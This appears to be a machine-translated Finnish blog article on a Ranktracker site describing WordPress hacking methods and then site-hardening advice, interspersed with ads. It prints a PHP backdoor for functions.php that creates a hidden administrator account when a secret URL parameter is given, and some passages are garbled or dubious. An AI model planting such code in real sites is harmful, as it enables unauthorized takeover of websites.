• WordPress

Miten Hack WordPress?

  • Felix Rose-Collins
  • 7 min read
Miten Hack WordPress?

Intro

Ennen kuin aloitamme tämän artikkelin, haluamme sinun tietävän, että hakkerointi on laitonta, emmekä motivoi tai kannusta mihinkään pahantahtoiseen toimintaan. Tämän artikkelin tarkoituksena on ainoastaan hankkia tietoa siitä, miten huijarit toimivat ja miten monipuoliset sivustojen turvallisuusmenetelmät ovat välttämättömiä, jotta heidät voidaan pitää loitolla. Keskustellaanpa:

  • Miten huijarit hakkeroida WordPress?
  • Miten turvata WP-sivustosi huijareilta?

Aloitetaan siis ilman muuta aiheen käsittely.

Miten Hack WordPress Website Online?

How to Hack WordPress Website Online (Lähde: wpsecurityninja.com)

WPScanin käyttäminen:

WPScan on WP-tietoturvaskanneri, joka auttaa sivuston omistajia tarkistamaan WordPress-sivustonsa haavoittuvuuksien varalta, mutta hakkerit käyttävät tätä skanneria myös täyttääkseen motiivinsa hakata verkkosivustoja.

WPScan sallii sivuston omistajien ja ylläpitäjien määrittää WP-käyttäjätilit ja brute force -salasanat, ja ne ovat tärkein askel luvattoman pääsyn saamiseksi WP-tileille.

Brute force username and password using WPScan (Käyttäjätunnuksen ja salasanan murtautuminen WPScanin avulla. Lähde: Medium)

MIM-hyökkäykset:

MIM-hyökkäykset (Man-in-middle) voidaan toteuttaa helposti, jos käyttäjät käyttävät samankaltaisia lähiverkkoja. Salakirjoittamattomat käyttäjätunnukset ovat helppo kohde, koska kaikki tiedot ovat näkyvissä selväkielisenä tekstinä.

Tämäntyyppisten hyökkäysten toteuttamiseen osallistuvat ohjelmistot voivat havaita vaarantuneet teemat, laajennukset ja luetteloida käyttäjät.

MIM Attacks (Lähde: Medium)

SQL-injektiot:

SQL-injektiohyökkäyksiä pidetään merkittävimpinä hyökkäyksinä, joita käytetään verkkosivuille tunkeutumiseen. Nämä hyökkäykset kohdistuvat verkkosivuston taustaportteihin, ja hakkerit voivat tunkeutua niihin toteuttamalla vaarannettuja komentoja.

SQL Injections (Lähde: secure.wphackedhelp.com)

Tapaa Ranktracker

All-in-One-alusta tehokkaaseen hakukoneoptimointiin

Jokaisen menestyvän yrityksen takana on vahva SEO-kampanja. Mutta kun tarjolla on lukemattomia optimointityökaluja ja -tekniikoita, voi olla vaikea tietää, mistä aloittaa. No, älä pelkää enää, sillä minulla on juuri oikea apu. Esittelen Ranktracker all-in-one -alustan tehokasta SEO:ta varten.

Olemme vihdoin avanneet Ranktrackerin rekisteröinnin täysin ilmaiseksi!

Luo ilmainen tili

Tai Kirjaudu sisään omilla tunnuksillasi

Näiden tunkeutumisten avulla hakkerit voivat myös muokata tietokantoja ja komentoja sekä poistaa tai varastaa sivuston tietoja.

Koska nämä SQL-hyökkäykset havaitsevat haavoittuvat ja suojaamattomat sivustot, ne tekevät hakkerointitehtävästä helppoa ja onnistunutta.

Hyödyntämällä My SQL/cPanel:

Tässä menetelmässä hakkerit luovat väärennetyn tilin tai muuttavat WP-sivuston nykyisen käyttäjän salasanaa. Hakkerit yrittävät tunkeutua cPanelin kautta avaamalla PhpMyAdminin. He etsivät _users-päätteistä taulukkoa ja löytävät käyttäjän, jota he haluavat muuttaa.

Näin he voivat muuttaa sen käyttäjän tunnistetietoja, jonka he aikovat hakkeroida. He jäljittävät käyttäjän ja muuttavat käyttäjän salasanan (user_pass-kentästä) avaamalla online MD5-generaattorin, korvaavat sen haluamallaan salasanalla ja klikkaavat myöhemmin #.

Utilizing My SQL/cPanel (Käyttäjätunnukset, käyttäjien hashed-salasanat, heidän sähköpostitunnuksensa jne. tallennetaan wp_users-tietokantatauluun. Lähde: firstsiteguide.com)

Käyttäjätunnukset, käyttäjien hashed-salasanat, heidän sähköpostitunnuksensa jne. tallennetaan wp_users-tietokantatauluun.

Functions.php-tiedoston muokkaaminen:

Hakkerit pääsevät myös cPaneliin muokkaamaan Functions.php-tiedostoa. Avaamalla Tiedostonhallinnan lukituksen he metsästävät aktiivisen teeman kansiota. public_html/wp_content/themes-kansiosta he jäljittävät teeman ja muokkaavat functions.php-tiedostoa sijoittamalla vaarannetun koodinsa. Hakkerointi on jo käynnissä, koska hakkerit ovat luoneet uuden tilin. Kun tämä on tehty, he poistavat vaarannetun koodin.

Luo uusi käyttäjätili FTP:n kautta:

Yleensä FTP-tilit auttavat sivuston omistajia luomaan sivustolleen hakemiston, jonka avulla tietyt käyttäjät voivat ladata tai ladata tiedostojaan kirjautumistunnuksillaan.

Näitä tiedostoja tarkastellaan myös Internetissä.

Vaiheet FTP-tilin luomiseksi sivustolla:

  • Syötä halutut tiedot
  • Kirjoita uuden FTP-käyttäjän käyttäjätunnus
  • Syötä salasana FTP-tilin jakamista varten.
  • Kirjoita hakemiston nimi, johon annetaan pääsy FTP:n kautta.
  • Kirjoita haluamasi MB tilaa, jonka haluat osoittaa tälle kansiolle.
  • Paina myöhemmin "Luo" -painiketta luodaksesi uuden tilin.

Uuden käyttäjän on ladattava alla mainitut tiedot saadakseen pääsyn FTP:n kautta.


Osoite / Host Name / Address: yourdomain.com tai ftp.yourdomain.com Käyttäjä / User: user@yourdomain.com Salasana: tälle FTP-tilille määritetty salasana.

Portti: 21Nimeä kansio tiedostojen lataamista/lataamista varten.


Uudella käyttäjällä on luku- ja kirjoitusoikeudet sekä valittuun hakemistoon että kaikkiin sen sisältämiin alihakemistoihin. Jos esimerkiksi luot asiakaskäyttäjän ja annat hänelle oikeudet hakemistoon / home / user / public_html

Tunkeutuminen takaoven kautta:

Pahansuopa tapa tunkeutua sivustolle on takaoven kautta. Olipa kyseessä sitten huijari, joka haluaa päästä sivustoosi, tai uhriksi joutunut käyttäjä, joka haluaa saada takaisin pääsyn sivustolleen takaoven kautta, molempien on noudatettava alla olevia ohjeita.

Tapaa Ranktracker

All-in-One-alusta tehokkaaseen hakukoneoptimointiin

Jokaisen menestyvän yrityksen takana on vahva SEO-kampanja. Mutta kun tarjolla on lukemattomia optimointityökaluja ja -tekniikoita, voi olla vaikea tietää, mistä aloittaa. No, älä pelkää enää, sillä minulla on juuri oikea apu. Esittelen Ranktracker all-in-one -alustan tehokasta SEO:ta varten.

Olemme vihdoin avanneet Ranktrackerin rekisteröinnin täysin ilmaiseksi!

Luo ilmainen tili

Tai Kirjaudu sisään omilla tunnuksillasi

Kun uusi käyttäjätili luodaan FTP:n kautta tai salasanan nollaus tehdään, mutta se ei tuota toivottuja tuloksia, käyttäjä saattaa haluta hakkeroida sivustonsa takaoven kautta ja hakea ylläpitäjän käyttöoikeudet.

Vaiheet takaoven luomiseen:

  • Avaa functions.php-tiedosto ja liitä alla oleva koodi.
add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
  • Tallenna muutokset myöhemmin.

Crypto Jacking & Cryptocurrency Mining:

Kryptovaluuttojen suosio on synnyttänyt uusia kyberuhkia, kuten kryptokaappauksen, jota kutsutaan myös kryptovaluuttojen louhintahaittaohjelmaksi.

Tietokoneen takavarikointia vastoin käyttäjän tahtoa ja tietoisuutta kutsutaan kryptokaappaukseksi. Kryptokaappaus-haittaohjelmissa huijarit tartuttavat käyttäjän tietokoneeseen haittaohjelmia, jotka toimitetaan järjestelmien ja verkkojen vaarantamiseen tarkoitettujen ohjelmistojen kautta.

Phishing:

Phishing on menetelmä, jossa huijarit huijaavat käyttäjiltä arkaluonteisia tietoja (kirjautumistiedot, sosiaalitilin numero, PIN-koodi, luottokorttitiedot jne.) esiintymällä oikeushenkilöinä. He turvautuvat yleensä sähköposteihin täyttääkseen tarkoituksensa.

Esimerkki: Hän voi myös laittaa phishing-sähköpostiin huonon linkin ja ohjata käyttäjän jollekin petolliselle sivustolle, josta hän voi toimittaa haittaohjelman.

Haittaohjelma:

WordPress Security Tilastot osoittavat, että 4000 WP-sivustot ovat saaneet tartunnan haittaohjelmista väärennettyjen SEO-liitännäisten vuoksi.

Huijarit eivät tarvitse lähdettä haittaohjelmien toimittamiseen. SEO-liitännäiset, WP-teemat ja monet muut sivustossa olevat tekijät ovat motivoineet hakkereita käyttämään viimeaikaista WP-VCD-haittaohjelmaa.

Jopa phishing-sähköpostit ovat portteja haittaohjelmien toimittamiseen.

Hakkerien motto on tässäkin tapauksessa sama: he pyrkivät saamaan arkaluonteisia tietoja käyttäjiltä tunkeutumalla järjestelmiin ja varastamalla tietoja.

WordPress Ransomware:

WP-kiristysohjelmissa hakkerit käyttävät haittaohjelmia estääkseen käyttäjien pääsyn järjestelmiin ja verkkoihin. Käyttäjä voi saada saman takaisin maksamalla hakkerin vaatimat lunnaat.

Esimerkki: Petya-hyökkäys, jossa hakkeri salaa tiedostosi ja tietosi ja vaatii lunnaita salauksen purkuavainta vastaan.

XSS-hyökkäys (Cross-Site Scripting):

Hakkerit tekevät XSS-hyökkäyksiä lisäämällä verkkosivuille haitallista sisältöä ja hyödyntämällä näin selainta. Tämän hyökkäyksen avulla hakkeri voi varastaa tietoja evästeistä, muuttaa sivuston sisältöä ja kaapata sivuston saadakseen haltuunsa arkaluonteisia tietoja.

Klikkaushyökkäys:

Klikkaushyökkäyksessä hakkeri yrittää vahingoittaa painiketta/linkkiä ja motivoi käyttäjää klikkaamaan vahingoittunutta kohdetta. Näin hakkeri voi suorittaa vahingollisia komentoja päästäkseen käsiksi käyttäjän kannalta arkaluontoisiin tietoihin.

Spoofing:

Väärentäminen on hyökkäys, jossa henkilö naamioituu luotettavaksi henkilöllisyydeksi saadakseen laitonta hyötyä käyttäjältä ja huijatakseen häntä luovuttamaan luottamuksellisia tietojaan.

Kaikkien näiden hakkerointihyökkäysten estämiseksi on toteutettava erityisiä turvatoimia WP-sivuston suojaamiseksi.

Miten turvata WordPress-sivuston hakkerointi?

How to Secure WordPress Website from Hacking? (Lähde: envisagedigital.co.uk)

Edellä mainitut tilastot riittävät osoittamaan WordPressin suosion. Juuri tämä suosio tekee tästä CMS-alustasta halutumman hakkerien keskuudessa, jotka yrittävät erilaisia hakkerointimenetelmiä päästäkseen käsiksi WP-sivustoihin ja niiden tietoihin.

Siksi on tärkeää tietää, miten estää hakkereita pääsemästä WP-sivustollesi.

Suojaa WP-sivustosi SSL-sertifikaatilla:

Kun sivustolle ladataan tietoja, ne ovat aina pelkkää tekstiä, joka on helposti kaikkien, myös hakkerien, nähtävissä. Tämä voi olla riskialtista, koska hakkerit voivat käyttää sivustosi tietoja väärin.

SSL (Secure Socket Layers) -varmenteet ovat digitaalisia varmenteita, jotka auttavat suojaamaan WP-sivustosi 256-bittisellä salausturvalla ja muuntamaan sivustosi tiedot koodattuun muotoon.

Hakkerit eivät pysty lukemaan koodeja, vaikka he ovat päässeet sivustollesi, ja siksi heidän on pakko poistua tällaisilta sivustoilta.

Secure your WP site with SSL Certificate (Lähde: clickssl.net)

Valitse haluamasi SSL-sertifikaatin merkki (Comodo, Thawte, RapidSSL jne.) ja asenna se WP-sivustollesi. SSL-sertifikaatin tyypin osalta sinun on ymmärrettävä verkkotunnukset ja alaverkkotunnukset. Jos esimerkiksi WP-sivustollasi on aliverkkotunnuksia, yksi halpa Wildcard-sertifikaatti, joka maksaa vain 45 dollaria vuodessa, voi turvata koko digitaalisen liiketoimintasi.

Nopea myöntäminen, 2048-bittinen avainsalaus, SEO-parannus, sivuston luottamussinetti, 99 % selainten ja mobiililaitteiden yhteensopivuus, hyvityskäytäntö ja takuu ovat muutamia Wildcard SSL -sertifikaattien ominaisuuksista ja eduista.

SSL-tuotteiden monipuoliset tuotemerkit ja -vaihtoehdot, budjettiystävälliset hinnat ja erinomainen asiakaspalvelu ovat muutamia etuja, joita ClickSSL-kaupan käyttäminen WP-sivuston suojaamiseen tuo mukanaan.

Päivitä työntekijät:

Inhimilliset virheet voivat olla katastrofaalisia, joten pidä työntekijäsi aina ajan tasalla uusimmista kyberuhkista, jotta he eivät ole haavoittuvia.

Jos työntekijäsi pystyvät jäljittämään hakkeroidun verkkosivuston epäilyttävät signaalit alkuvaiheessa, he voivat ilmoittaa asiasta asianomaisille ja estää sivustosi ja yrityksesi lisävahinkojen syntymisen.

Käytä kaksitekijätodennusta (2FA):

2FA:n käyttöönotto sivustolle kirjautumisen aikana on keskeisin tapa torjua raa'an voiman hyökkäykset. Sen lisäksi, että ne lisäävät toisen turvakerroksen, ne myös estävät sivuston ja käyttäjän tietojen suojaamisen.

Tämä johtuu siitä, että jos yksi tietoturvataso on vaarantunut, huijarin on tunkeuduttava toiseen tasoon päästäkseen verkkosivustolle.

Tämä on vaikea valinta, ja siksi useimmissa tapauksissa huijarit päätyvät siirtymään muille huonosti suojatuille sivustoille.

Vinkki: WP 2FA on ilmainen WP-lisäosa, joka antaa WP-sivustollesi ylimääräisen tietoturvatason.

Tarkasta järjestelmänvalvojan käyttäjät säännöllisesti:

Tämä on tärkeää WP-sivuston turvallisuuden kannalta. Varmista, että tarkastat ylläpitäjäkäyttäjiäsi säännöllisesti ja ristiintarkastat heidän käyttöoikeutensa.

Varmista myös, että käyttäjilläsi ja työntekijöilläsi on rajoitettu käyttöoikeus tehtäviensä mukaisesti, jotta vältät tietoturvaongelmat.

Päivitä WordPressin ydin säännöllisesti:

Etkö tiedä WP Corea?

Kerron lyhyesti, että WP Core sisältää kaikki WP:n toiminnan edellyttämät perustiedot.

WordPress.orgista ladatun WP zip-tiedoston tiedostoluettelo

Update WordPress Core Regularly (Lähde: ithemes.com)

Nämä ydintiedostot on päivitettävä säännöllisesti tietoturvapäivitysten julkaisun jälkeen, jotta kaikki tietoturva-aukot voidaan korjata.

Lataa WP-teemoja ja liitännäisiä luotettavista lähteistä:

Tämä on ratkaisevan tärkeää, koska liitännäiset voivat olla uhkaavia, jos niitä ei ole päivitetty tai ne on asennettu epäluotettavista lähteistä. Jos käytät ilmaisia tai maksullisia lisäosia, tarkista aina alla mainitut tekijät, kuten:

  • Käyttäjien arviot & arvostelut
  • Käyttäjäystävällisyys
  • Yhteensopivuus
  • Turvallisuus
  • Luotettavuus

Download WP Themes & Plugins from Trustworthy Sources (Lähde: torquemag.io)

Sama sääntö koskee myös WP-teemojen asentamista.

Päivitä WP-teemat ja -pluginit säännöllisesti:

Vanhentuneet tai vanhentuneet WP-teemat ja -pluginit ovat aina uhka WP-sivustollesi, koska ne menettävät turvallisuusstandardejaan. Jotta hakkerit eivät käyttäisi tällaisia portteja haittaohjelmien levittämiseen ja pääsisi sivustolle, varmista, että WP-sivustossasi käytetyt teemat ja liitännäiset päivitetään säännöllisesti.

Tämä auttaa lisäosaa toimimaan oikein ja pysymään synkronoituna WP:n uusimpien versioiden kanssa.

Vinkki: Kunkin laajennuksen vieressä on linkki, jossa lukee "Ota automaattiset päivitykset käyttöön". Ota se käyttöön automaattisia päivityksiä varten.

Muokkaa oletusarvoisen järjestelmänvalvojan nimeä:

Hakkerit ovat liian fiksuja, ja he voivat helposti tunkeutua WP-sivustollesi käyttämällä oletusarvoista ylläpitäjän nimeä. On aina parempi muuttaa oletusarvoista admin-käyttäjänimeä, jotta hakkerit eivät voi suorittaa brute-force-hyökkäyksiä saadakseen luvattoman pääsyn verkkosivustollesi.

Rajoitetun käyttöoikeuden myöntäminen:

Älä koskaan anna enempää kuin on tarpeen, ja sama sääntö pätee myönnettäessä sivuston käyttöoikeuksia käyttäjille ja työntekijöille.

Pääsynvalvonta on sivuston ja tietoturvan tärkein sääntö, sillä siinä määritellään, kuka voi ja kuka ei voi käyttää sivustoa. Estä kaikki sisäänkäynnit WP-adminiin ja muihin kriittisiin koodeihin ja tietoihin sivuston turvallisuuden varmistamiseksi.

Rajoitettu käyttöoikeus parantaa tuottavuutta, mutta se myös suojaa sivustosi haitallisilta merkinnöiltä.

Päivitä WordPress:

Kun WordPressiä ei päivitetä, sivustosi on vaarassa joutua hakkereiden hyökkäyksen kohteeksi.

WordPress hallitsee 37 % markkinaosuudesta, ja se julkaisee säännöllisesti päivityksiä tietoturva-aukkojen ja virheiden korjaamiseksi. Näihin päivityksiin sisältyy myös uusia ominaisuuksia ja parannuksia olemassa oleviin ominaisuuksiin, jotka ovat hyödyllisiä sivustosi suorituskyvyn parantamisessa.

Tapaa Ranktracker

All-in-One-alusta tehokkaaseen hakukoneoptimointiin

Jokaisen menestyvän yrityksen takana on vahva SEO-kampanja. Mutta kun tarjolla on lukemattomia optimointityökaluja ja -tekniikoita, voi olla vaikea tietää, mistä aloittaa. No, älä pelkää enää, sillä minulla on juuri oikea apu. Esittelen Ranktracker all-in-one -alustan tehokasta SEO:ta varten.

Olemme vihdoin avanneet Ranktrackerin rekisteröinnin täysin ilmaiseksi!

Luo ilmainen tili

Tai Kirjaudu sisään omilla tunnuksillasi

Why you should always update your wordpress (Lähde: wpbeginner.com)

Pidä WP-sivustosi ajan tasalla vankan turvallisuuden varmistamiseksi.

Lopetetaan:

Käytä vahvoja ja monimutkaisia salasanoja ja pidä WP-sivustosi sekä liitännäiset ja teemat päivitettyinä, jotta kaikki tietoturva-aukot voidaan korjata. Käytä aikaa työntekijöidesi kouluttamiseen, sillä se auttaa aina estämään katastrofeja.

Älä koskaan mene löysälle turvallisuudesta ja varmista aina, että käytät parhaita ja luotettavia tietoturvaliitännäisiä pitämään WP-sivustosi turvassa uteliailta katseilta. Suojaa sivustosi lisäksi SSL:llä, jotta voit parantaa asiakkaiden luottamusta, liiketoimintaa ja SEO:ta.

Nyt kun olet tietoinen siitä, miten hakkerit toimivat, toivomme, että tämä artikkeli auttaa sinua estämään hakkereita tunkeutumasta sivustoosi ja hallitsemaan WP-sivustoasi turvallisella tavalla.

Felix Rose-Collins

Felix Rose-Collins

Ranktracker's CEO/CMO & Co-founder

Felix Rose-Collins is the Co-founder and CEO/CMO of Ranktracker. With over 15 years of SEO experience, he has single-handedly scaled the Ranktracker site to over 500,000 monthly visits, with 390,000 of these stemming from organic searches each month.

Aloita Ranktrackerin käyttö... ilmaiseksi!

Selvitä, mikä estää verkkosivustoasi sijoittumasta.

Luo ilmainen tili

Tai Kirjaudu sisään omilla tunnuksillasi

Different views of Ranktracker app